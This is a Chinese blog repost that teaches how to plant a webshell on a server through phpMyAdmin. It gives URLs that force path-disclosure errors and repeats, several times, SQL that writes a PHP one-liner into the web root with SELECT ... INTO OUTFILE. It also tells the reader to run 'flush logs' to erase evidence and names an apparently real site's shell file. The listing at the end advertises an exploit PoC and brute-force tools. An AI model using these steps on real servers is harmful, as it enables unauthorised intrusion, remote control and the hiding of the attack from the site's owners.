`
hxai11
  • 浏览: 21233 次
  • 性别: Icon_minigender_1
  • 来自: 深圳
最近访客 更多访客>>
社区版块
存档分类
最新评论

phpmyadmin 后台拿webshell

 
阅读更多
1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径
D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;

 

 

 

Fatal error: Call to a member function getImgPath() on a non-object in D:\www\phpMyAdmin\themes\darkblue_orange\layout.inc.php on line 67


这里随便选择一个 数据库 我们这用MYSQL 然后点SQL 执行SQL语句
Create TABLE a (cmd text NOT NULL); 这句是 在MYSQL这个数据库中建一个 a 的表段
看到了吧   a 已经有了 然后再执行
Insert INTO a (cmd) VALUES('');
意思你应该懂了吧   就是 把PHP一句话 写到a这个表里
继续
select cmd from a into outfile 'D:/www/d.php';
这一句 就是说 把刚刚的那个 a 的表 输出到 网站的目录下的哪个文件里 我们这里把 刚暴出来的
路径写上   这里一定要注意 Windows里面的 / 这个斜刚 一定要注意 要把\ 这个斜刚换成/这个斜刚 不然PHP 不支持 就不会成功了

http://www.crystalnet.com.cn/d.php   ok了 连接我们的 PHP一句话


首先:
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

然后:
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下,要不就无法访问shell了,可以直接输出到phpmyadmin目录下,不知道就phpinfo) */
flush logs /* 删除日志 */

删掉刚建的joyuan数据库,直接删除或执行SQL命令:drop database joyuan;

利用PHP一句话客户端(http://linux.chaom.net/Shell.Htm)写自己的shell

PHP一句话的服务端地址就是:http://xxx/phpmyadmin/server.php

搞定,嘿嘿。

PHP一句话服务端代码:

 

========================================

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;


========================================

①建立数据库

create database hakz                        /*建立数据库hakz*/

use hakz                                          /*连接hakz数据库*/

create table shell(code text)           /*建立表shell,字段code为文本型数据*/       ②插入导出shell

insert into shell(code) values ('后门代码');       /*插入shell代码*/

select * into outfile '/home/www/website/…路径/shell.php' from shell;

                                                  /*导出shell到web路径下*/

flush logs                                       /*删除日志 这一点很重要哦*/        ③删除临时数据库

drop database hakz                   /*或者直接在phpmyadmin中进行可视化操作*/
最后附上几种PHP一句话服务端代码:


                   /*容错代码*/

                  /*assert 函数和 eval一样*/

 

_______________________________________
本篇文章来源于Vip_威寶] | 关注网络信息安全 [http://www.weibao.tk/]
详细地址为:http://www.weibao.tk/article.asp?id=223

分享到:
评论

相关推荐

    利用phpMyAdmin拿webshell

    利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell

    phpmyadmin上传Webshell总结.docx

    【PHPMyAdmin上传Webshell详解】 在网络安全领域,Webshell是一种后门程序,通常由攻击者上传到服务器,以便远程控制被黑站点。PHPMyAdmin是广泛使用的MySQL数据库管理工具,有时会被黑客利用来上传Webshell。以下...

    phpMyAdmin后台getshell复现

    phpMyAdmin后台getshell复现

    Phpmyadmin后台代码执行CVE-2016-5734_poc

    Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...

    phpmyadmin及php爆路径字典

    phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典

    御剑后台扫描珍藏版.rar(后台扫描工具)

    /intraAdmin/phpmyadmin/db_create.php /phpmyadmin/db_create.php /intraAdmin/admin.php /do/reg.php /tag.php /wp-admin/install.php /wp-admin/admin-ajax.php /Html/fckeditor/fckeditor.php /admin/admin.php ...

    单文件phpmyadmin,功能强大不比phpmyadmin差

    单文件phpmyadmin,功能强大不比phpmyadmin差,可导出导入。可执行sql语句。

    phpMyAdmin 5.2.1 (多语言版)

    **phpMyAdmin 5.2.1 多语言版详解** phpMyAdmin 是一个非常流行的开源Web应用程序,专为MySQL数据库管理系统提供用户友好的界面,使得数据库管理变得简单易行,即使对于没有深入数据库知识的用户也是如此。在版本...

    phpMyAdmin配置文件config 详解.doc

    了解配置文件的内容和作用可以帮助我们更好地使用 phpMyAdmin。 phpMyAdmin 配置文件概述 phpMyAdmin 配置文件 config.inc.php 由多个部分组成,每个部分都有其特定的作用。下面我们将对每个部分进行详细的解释。 ...

    phpMyAdmin多线程批量破解工具

    phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的...

    Phpmyadmin

    **phpMyAdmin** phpMyAdmin 是一个开源的、基于Web的MySQL数据库管理工具,它允许用户通过浏览器界面轻松地执行各种数据库操作,如创建、修改和删除数据库表,执行SQL查询,管理用户权限等。这款工具是用PHP编程...

    phpmyadmin2.5.3.rar

    《PHPMyAdmin 2.5.3:数据库管理的强大工具》 PHPMyAdmin,作为一款开源、免费且功能丰富的MySQL数据库管理工具,以其强大的在线数据库管理和维护能力深受开发者喜爱。标题中的“phpmyadmin2.5.3.rar”指的是这个...

    phpMyAdmin

    phpMyAdmin - Readme =================== Version 4.3.3 A set of PHP-scripts to manage MySQL over the web. http://www.phpmyadmin.net/ Summary ------- phpMyAdmin is intended to handle the ...

    phpmyadmin

    **phpMyAdmin:MySQL数据库管理的强大工具** phpMyAdmin 是一款非常流行的开源Web应用程序,用于管理和维护MySQL数据库。它提供了一个直观的用户界面,使得非技术背景的用户也能轻松执行常见的数据库操作,如创建、...

    phpMyAdmin修正补丁3.1.1

    phpmyadmin是大家很常用的用来管理mysql数据库的软件。它虽然已经提供了对中文的支持,但是,仅限于字段编码为:utf-8(utf8)、gbk、gb2312。对其它的编码,使用phpmyadmin进行查看时会显示为乱码。  虽然对于新的...

    phpMyAdmin最新中文版

    **phpMyAdmin中文版详解** phpMyAdmin是一款广泛使用的基于Web的MySQL数据库管理工具,它提供了用户友好的界面,使得数据库的创建、管理和维护变得轻松易行。此版本被标记为"phpMyAdmin最新中文版",意味着它包含了...

    phpmyadmin数据库管理工具(图解)

    phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)phpmyadmin数据库管理工具(图解)

    phpMyAdmin修正补丁3.1.2

    phpmyadmin是大家很常用的用来管理mysql数据库的软件。它虽然已经提供了对中文的支持,但是,仅限于字段编码为:utf-8(utf8)、gbk、gb2312。对其它的编码,使用phpmyadmin进行查看时会显示为乱码。  虽然对于新的...

    phpmyadmin管理用户手册

    phpMyAdmin 管理用户手册 本手册旨在为用户提供详细的 phpMyAdmin 管理指导,涵盖了 phpMyAdmin 的基本概念、安装、配置、权限设置、数据库操作、数据导入和导出等方面的知识点。 phpMyAdmin 简介 phpMyAdmin 是...

Global site tag (gtag.js) - Google Analytics